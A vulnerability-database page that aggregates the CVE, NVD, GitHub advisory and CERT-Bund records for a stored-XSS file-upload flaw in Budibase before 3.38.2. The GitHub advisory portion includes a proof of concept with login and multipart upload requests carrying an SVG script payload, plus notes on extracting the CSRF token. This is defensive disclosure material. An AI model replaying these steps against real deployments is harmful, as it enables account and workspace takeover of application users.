CVE-2026-46426 (GCVE-0-2026-46426)
Vulnerability from cvelistv5 – Published: 2026-05-27 17:04 – Updated: 2026-05-27 18:02
VLAI
Title
Budibase: Unrestricted Upload of File with Dangerous Type
Summary
Budibase is an open-source low-code platform. Prior to 3.38.2, the file upload endpoint POST /api/attachments/process does not enforce active-content restrictions for authenticated users. The checks for dangerous file extensions are conditionally wrapped inside if (isPublicUser) or if (isPublicUser || !env.SELF_HOSTED), meaning any authenticated builder can upload executable web content — SVG files with inline <script> tags, HTML pages with JavaScript, .js modules — which are then stored in the object store (MinIO/S3) with their correct MIME types. When the resulting signed URL is opened by any app user, the browser executes the payload. Impact is persistent stored XSS over all application end users. This vulnerability is fixed in 3.38.2.
Severity
7.6 (High)
CWE
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/Budibase/budibase/security/adv… | x_refsource_CONFIRM |
| https://github.com/Budibase/budibase/releases/tag… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-46426",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-27T18:01:32.331508Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-27T18:02:00.561Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/Budibase/budibase/security/advisories/GHSA-82rc-gxrg-v4gf"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "budibase",
"vendor": "Budibase",
"versions": [
{
"status": "affected",
"version": "\u003c 3.38.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Budibase is an open-source low-code platform. Prior to 3.38.2, the file upload endpoint POST /api/attachments/process does not enforce active-content restrictions for authenticated users. The checks for dangerous file extensions are conditionally wrapped inside if (isPublicUser) or if (isPublicUser || !env.SELF_HOSTED), meaning any authenticated builder can upload executable web content \u2014 SVG files with inline \u003cscript\u003e tags, HTML pages with JavaScript, .js modules \u2014 which are then stored in the object store (MinIO/S3) with their correct MIME types. When the resulting signed URL is opened by any app user, the browser executes the payload. Impact is persistent stored XSS over all application end users. This vulnerability is fixed in 3.38.2."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-434",
"description": "CWE-434: Unrestricted Upload of File with Dangerous Type",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-27T17:04:42.080Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/Budibase/budibase/security/advisories/GHSA-82rc-gxrg-v4gf",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/Budibase/budibase/security/advisories/GHSA-82rc-gxrg-v4gf"
},
{
"name": "https://github.com/Budibase/budibase/releases/tag/3.38.2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/Budibase/budibase/releases/tag/3.38.2"
}
],
"source": {
"advisory": "GHSA-82rc-gxrg-v4gf",
"discovery": "UNKNOWN"
},
"title": "Budibase: Unrestricted Upload of File with Dangerous Type"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-46426",
"datePublished": "2026-05-27T17:04:42.080Z",
"dateReserved": "2026-05-13T22:18:22.829Z",
"dateUpdated": "2026-05-27T18:02:00.561Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-46426",
"date": "2026-05-29",
"epss": "0.00032",
"percentile": "0.09924"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-46426\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-27T18:16:26.463\",\"lastModified\":\"2026-05-27T19:44:35.987\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Budibase is an open-source low-code platform. Prior to 3.38.2, the file upload endpoint POST /api/attachments/process does not enforce active-content restrictions for authenticated users. The checks for dangerous file extensions are conditionally wrapped inside if (isPublicUser) or if (isPublicUser || !env.SELF_HOSTED), meaning any authenticated builder can upload executable web content \u2014 SVG files with inline \u003cscript\u003e tags, HTML pages with JavaScript, .js modules \u2014 which are then stored in the object store (MinIO/S3) with their correct MIME types. When the resulting signed URL is opened by any app user, the browser executes the payload. Impact is persistent stored XSS over all application end users. This vulnerability is fixed in 3.38.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N\",\"baseScore\":7.6,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.3,\"impactScore\":4.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"},{\"lang\":\"en\",\"value\":\"CWE-434\"}]}],\"references\":[{\"url\":\"https://github.com/Budibase/budibase/releases/tag/3.38.2\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/Budibase/budibase/security/advisories/GHSA-82rc-gxrg-v4gf\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/Budibase/budibase/security/advisories/GHSA-82rc-gxrg-v4gf\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-46426\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-27T18:01:32.331508Z\"}}}], \"references\": [{\"url\": \"https://github.com/Budibase/budibase/security/advisories/GHSA-82rc-gxrg-v4gf\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-27T18:01:47.087Z\"}}], \"cna\": {\"title\": \"Budibase: Unrestricted Upload of File with Dangerous Type\", \"source\": {\"advisory\": \"GHSA-82rc-gxrg-v4gf\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 7.6, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"Budibase\", \"product\": \"budibase\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.38.2\"}]}], \"references\": [{\"url\": \"https://github.com/Budibase/budibase/security/advisories/GHSA-82rc-gxrg-v4gf\", \"name\": \"https://github.com/Budibase/budibase/security/advisories/GHSA-82rc-gxrg-v4gf\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/Budibase/budibase/releases/tag/3.38.2\", \"name\": \"https://github.com/Budibase/budibase/releases/tag/3.38.2\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Budibase is an open-source low-code platform. Prior to 3.38.2, the file upload endpoint POST /api/attachments/process does not enforce active-content restrictions for authenticated users. The checks for dangerous file extensions are conditionally wrapped inside if (isPublicUser) or if (isPublicUser || !env.SELF_HOSTED), meaning any authenticated builder can upload executable web content \\u2014 SVG files with inline \u003cscript\u003e tags, HTML pages with JavaScript, .js modules \\u2014 which are then stored in the object store (MinIO/S3) with their correct MIME types. When the resulting signed URL is opened by any app user, the browser executes the payload. Impact is persistent stored XSS over all application end users. This vulnerability is fixed in 3.38.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-434\", \"description\": \"CWE-434: Unrestricted Upload of File with Dangerous Type\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-27T17:04:42.080Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-46426\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-27T18:02:00.561Z\", \"dateReserved\": \"2026-05-13T22:18:22.829Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-27T17:04:42.080Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-46426
Vulnerability from fkie_nvd - Published: 2026-05-27 18:16 - Updated: 2026-05-27 19:44
Severity
Summary
Budibase is an open-source low-code platform. Prior to 3.38.2, the file upload endpoint POST /api/attachments/process does not enforce active-content restrictions for authenticated users. The checks for dangerous file extensions are conditionally wrapped inside if (isPublicUser) or if (isPublicUser || !env.SELF_HOSTED), meaning any authenticated builder can upload executable web content — SVG files with inline <script> tags, HTML pages with JavaScript, .js modules — which are then stored in the object store (MinIO/S3) with their correct MIME types. When the resulting signed URL is opened by any app user, the browser executes the payload. Impact is persistent stored XSS over all application end users. This vulnerability is fixed in 3.38.2.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Budibase is an open-source low-code platform. Prior to 3.38.2, the file upload endpoint POST /api/attachments/process does not enforce active-content restrictions for authenticated users. The checks for dangerous file extensions are conditionally wrapped inside if (isPublicUser) or if (isPublicUser || !env.SELF_HOSTED), meaning any authenticated builder can upload executable web content \u2014 SVG files with inline \u003cscript\u003e tags, HTML pages with JavaScript, .js modules \u2014 which are then stored in the object store (MinIO/S3) with their correct MIME types. When the resulting signed URL is opened by any app user, the browser executes the payload. Impact is persistent stored XSS over all application end users. This vulnerability is fixed in 3.38.2."
}
],
"id": "CVE-2026-46426",
"lastModified": "2026-05-27T19:44:35.987",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 4.7,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-05-27T18:16:26.463",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/Budibase/budibase/releases/tag/3.38.2"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/Budibase/budibase/security/advisories/GHSA-82rc-gxrg-v4gf"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/Budibase/budibase/security/advisories/GHSA-82rc-gxrg-v4gf"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
},
{
"lang": "en",
"value": "CWE-434"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-82RC-GXRG-V4GF
Vulnerability from github – Published: 2026-05-19 16:31 – Updated: 2026-05-19 16:31
VLAI
Summary
Budibase: Unrestricted Upload of File with Dangerous Type
Details
Summary
The file upload endpoint POST /api/attachments/process does not enforce active-content restrictions for authenticated users. The checks for dangerous file extensions (html, svg, js, php, etc.) are conditionally wrapped inside if (isPublicUser) or if (isPublicUser || !env.SELF_HOSTED), meaning any authenticated builder can upload executable web content — SVG files with inline <script> tags, HTML pages with JavaScript, .js modules — which are then stored in the object store (MinIO/S3) with their correct MIME types (image/svg+xml, text/html, application/javascript). When the resulting signed URL is opened by any app user, the browser executes the payload.
Impact is persistent stored XSS over all application end users.
Details
The vulnerability exists in a single handler function uploadFile shared by two routes, located in packages/server/src/api/controllers/static/index.ts (lines 93–179).
Route definitions (packages/server/src/api/routes/static.ts):
POST /api/attachments/process → authorized(BUILDER) POST /api/attachments/:tableId/upload → authorized(PermissionType.TABLE, PermissionLevel.WRITE) Both routes invoke the same uploadFile function. The second endpoint is accessible to any authenticated app user (BASIC or POWER role) who has been granted WRITE on any table — not just builders.
PoC
Prerequisites
- Budibase self-hosted Docker deployment, any version ≤ 3.30.6
- An account with Builder role (does not require admin)
- Target app published and accessible to end users
Step 1 — Authenticate as builder
POST /api/global/auth/default/login HTTP/1.1
Host: target:10000
Content-Type: application/json
{"username":"builder@company.com","password":"BuilderPass1!"}
HTTP/1.1 200 OK
Set-Cookie: budibase:auth=<jwt>; path=/; expires=Tue, 19 Jan 2038 03:14:07 GMT
Set-Cookie: budibase:auth.sig=<sig>; path=/; expires=Tue, 19 Jan 2038 03:14:07 GMT
{"message":"Login successful"}
The CSRF token is bound to the session. Browsers send it automatically via the Budibase
frontend JS. For scripted requests, decode the JWT payload (base64url second segment) to
extract sessionId, then read the Redis key session-<userId>/<sessionId> → csrfToken.
Step 2 — Upload SVG with XSS payload
POST /api/attachments/process HTTP/1.1
Host: target:10000
Cookie: budibase:auth=<jwt>; budibase:auth.sig=<sig>
x-budibase-app-id: <dev_app_id>
x-csrf-token: <csrf_token>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXXXXXXXXXXXXXXXX
Content-Length: 391
------WebKitFormBoundaryXXXXXXXXXXXXXXXX
Content-Disposition: form-data; name="file"; filename="xss.svg"
Content-Type: image/svg+xml
<svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.domain)</script></svg>
------WebKitFormBoundaryXXXXXXXXXXXXXXXX--
HTTP/1.1 200 OK
[{"size":207,"name":"xss.svg","url":"http://target:10000/files/signed/.../<uuid>.svg?X-Amz-...","extension":"svg","key":"workspace_id/attachments/<uuid>.svg"}]
Impact
- App end users - Stored XSS on any screen containing the attachment URL. Session cookie theft → full account takeover. |
- Builder accounts - If malicious URL is shared within the workspace (table attachment, embedded image), XSS fires in builder's session → workspace takeover.
Discovered By: Abdulrahman Albatel Abdullah Alrasheed
Severity
7.6 (High)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "budibase"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.38.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46426"
],
"database_specific": {
"cwe_ids": [
"CWE-434",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-19T16:31:30Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nThe file upload endpoint `POST /api/attachments/process` does not enforce active-content restrictions for authenticated users. The checks for dangerous file extensions (`html`, `svg`, `js`, `php`, etc.) are conditionally wrapped inside `if (isPublicUser)` or `if (isPublicUser || !env.SELF_HOSTED)`, meaning any authenticated builder can upload executable web content \u2014 SVG files with inline `\u003cscript\u003e` tags, HTML pages with JavaScript, `.js` modules \u2014 which are then stored in the object store (MinIO/S3) with their correct MIME types (`image/svg+xml`, `text/html`, `application/javascript`). When the resulting signed URL is opened by any app user, the browser executes the payload.\n\nImpact is **persistent stored XSS** over all application end users.\n\n### Details\nThe vulnerability exists in a single handler function uploadFile shared by two routes, located in packages/server/src/api/controllers/static/index.ts (lines 93\u2013179).\n\nRoute definitions (packages/server/src/api/routes/static.ts):\n\nPOST /api/attachments/process \u2192 authorized(BUILDER)\nPOST /api/attachments/:tableId/upload \u2192 authorized(PermissionType.TABLE, PermissionLevel.WRITE)\nBoth routes invoke the same uploadFile function. The second endpoint is accessible to any authenticated app user (BASIC or POWER role) who has been granted WRITE on any table \u2014 not just builders.\n\n### PoC\n\n### Prerequisites\n\n- Budibase self-hosted Docker deployment, any version \u2264 3.30.6\n- An account with Builder role (does **not** require admin)\n- Target app published and accessible to end users\n\n### Step 1 \u2014 Authenticate as builder\n\n```http\nPOST /api/global/auth/default/login HTTP/1.1\nHost: target:10000\nContent-Type: application/json\n\n{\"username\":\"builder@company.com\",\"password\":\"BuilderPass1!\"}\n```\n\n```\nHTTP/1.1 200 OK\nSet-Cookie: budibase:auth=\u003cjwt\u003e; path=/; expires=Tue, 19 Jan 2038 03:14:07 GMT\nSet-Cookie: budibase:auth.sig=\u003csig\u003e; path=/; expires=Tue, 19 Jan 2038 03:14:07 GMT\n\n{\"message\":\"Login successful\"}\n```\n\nThe CSRF token is bound to the session. Browsers send it automatically via the Budibase\nfrontend JS. For scripted requests, decode the JWT payload (base64url second segment) to\nextract `sessionId`, then read the Redis key `session-\u003cuserId\u003e/\u003csessionId\u003e` \u2192 `csrfToken`.\n\n### Step 2 \u2014 Upload SVG with XSS payload\n\n```http\nPOST /api/attachments/process HTTP/1.1\nHost: target:10000\nCookie: budibase:auth=\u003cjwt\u003e; budibase:auth.sig=\u003csig\u003e\nx-budibase-app-id: \u003cdev_app_id\u003e\nx-csrf-token: \u003ccsrf_token\u003e\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryXXXXXXXXXXXXXXXX\nContent-Length: 391\n\n------WebKitFormBoundaryXXXXXXXXXXXXXXXX\nContent-Disposition: form-data; name=\"file\"; filename=\"xss.svg\"\nContent-Type: image/svg+xml\n\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\"\u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e\u003c/svg\u003e\n------WebKitFormBoundaryXXXXXXXXXXXXXXXX--\n```\n\n```json\nHTTP/1.1 200 OK\n\n[{\"size\":207,\"name\":\"xss.svg\",\"url\":\"http://target:10000/files/signed/.../\u003cuuid\u003e.svg?X-Amz-...\",\"extension\":\"svg\",\"key\":\"workspace_id/attachments/\u003cuuid\u003e.svg\"}]\n```\n### Impact\n* App end users - Stored XSS on any screen containing the attachment URL. Session cookie theft \u2192 full account takeover. |\n* Builder accounts - If malicious URL is shared within the workspace (table attachment, embedded image), XSS fires in builder\u0027s session \u2192 workspace takeover. \n\n\n\u003cimg width=\"3087\" height=\"1489\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b0ee0263-85de-430e-9575-88ec91eae565\" /\u003e\n\n\n\u003cimg width=\"2100\" height=\"1016\" alt=\"image\" src=\"https://github.com/user-attachments/assets/5133bb1e-f637-479e-952f-14b3265129b4\" /\u003e\n\n\n\n\n\n\n\n--------\nDiscovered By:\nAbdulrahman Albatel\nAbdullah Alrasheed",
"id": "GHSA-82rc-gxrg-v4gf",
"modified": "2026-05-19T16:31:30Z",
"published": "2026-05-19T16:31:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Budibase/budibase/security/advisories/GHSA-82rc-gxrg-v4gf"
},
{
"type": "PACKAGE",
"url": "https://github.com/Budibase/budibase"
},
{
"type": "WEB",
"url": "https://github.com/Budibase/budibase/releases/tag/3.38.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Budibase: Unrestricted Upload of File with Dangerous Type"
}
WID-SEC-W-2026-1564
Vulnerability from csaf_certbund - Published: 2026-05-17 22:00 - Updated: 2026-05-27 22:00Summary
Budibase: Mehrere Schwachstellen
Severity
Hoch
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung: Budibase ist eine quelloffene Low-Code-Plattform für die Erstellung interner Anwendungen, wie z. B. Verwaltungspanels.
Angriff: Ein entfernter, authentisierter Angreifer kann mehrere Schwachstellen in Budibase ausnutzen, um Administratorrechte zu erlangen, Sicherheitsmaßnahmen zu umgehen, Cross-Site-Scripting-Angriffe durchzuführen oder vertrauliche Informationen offenzulegen.
Betroffene Betriebssysteme: - Sonstiges
- UNIX
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Open Source Budibase <3.38.2
Open Source / Budibase
|
<3.38.2 |
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Open Source Budibase <3.38.2
Open Source / Budibase
|
<3.38.2 |
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Open Source Budibase <3.38.2
Open Source / Budibase
|
<3.38.2 |
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Open Source Budibase <3.38.2
Open Source / Budibase
|
<3.38.2 |
References
6 references
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Budibase ist eine quelloffene Low-Code-Plattform f\u00fcr die Erstellung interner Anwendungen, wie z. B. Verwaltungspanels.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, authentisierter Angreifer kann mehrere Schwachstellen in Budibase ausnutzen, um Administratorrechte zu erlangen, Sicherheitsma\u00dfnahmen zu umgehen, Cross-Site-Scripting-Angriffe durchzuf\u00fchren oder vertrauliche Informationen offenzulegen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Sonstiges\n- UNIX",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2026-1564 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-1564.json"
},
{
"category": "self",
"summary": "WID-SEC-2026-1564 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1564"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-6vp2-6r7m-2jvx vom 2026-05-17",
"url": "https://github.com/Budibase/budibase/security/advisories/GHSA-6vp2-6r7m-2jvx"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-82rc-gxrg-v4gf vom 2026-05-17",
"url": "https://github.com/Budibase/budibase/security/advisories/GHSA-82rc-gxrg-v4gf"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-q9rw-q89f-jx2f vom 2026-05-17",
"url": "https://github.com/Budibase/budibase/security/advisories/GHSA-q9rw-q89f-jx2f"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-qv26-4hvj-m7fv vom 2026-05-17",
"url": "https://github.com/Budibase/budibase/security/advisories/GHSA-qv26-4hvj-m7fv"
}
],
"source_lang": "en-US",
"title": "Budibase: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2026-05-27T22:00:00.000+00:00",
"generator": {
"date": "2026-05-28T07:29:00.732+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.6.0"
}
},
"id": "WID-SEC-W-2026-1564",
"initial_release_date": "2026-05-17T22:00:00.000+00:00",
"revision_history": [
{
"date": "2026-05-17T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2026-05-27T22:00:00.000+00:00",
"number": "2",
"summary": "Referenz(en) aufgenommen: EUVD-2026-32598, EUVD-2026-32597, EUVD-2026-32596, EUVD-2026-32595"
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c3.38.2",
"product": {
"name": "Open Source Budibase \u003c3.38.2",
"product_id": "T054248"
}
},
{
"category": "product_version",
"name": "3.38.2",
"product": {
"name": "Open Source Budibase 3.38.2",
"product_id": "T054248-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:budibase:budibase:3.38.2"
}
}
}
],
"category": "product_name",
"name": "Budibase"
}
],
"category": "vendor",
"name": "Open Source"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-46424",
"product_status": {
"known_affected": [
"T054248"
]
},
"release_date": "2026-05-17T22:00:00.000+00:00",
"title": "CVE-2026-46424"
},
{
"cve": "CVE-2026-46426",
"product_status": {
"known_affected": [
"T054248"
]
},
"release_date": "2026-05-17T22:00:00.000+00:00",
"title": "CVE-2026-46426"
},
{
"cve": "CVE-2026-46425",
"product_status": {
"known_affected": [
"T054248"
]
},
"release_date": "2026-05-17T22:00:00.000+00:00",
"title": "CVE-2026-46425"
},
{
"cve": "CVE-2026-46427",
"product_status": {
"known_affected": [
"T054248"
]
},
"release_date": "2026-05-17T22:00:00.000+00:00",
"title": "CVE-2026-46427"
}
]
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…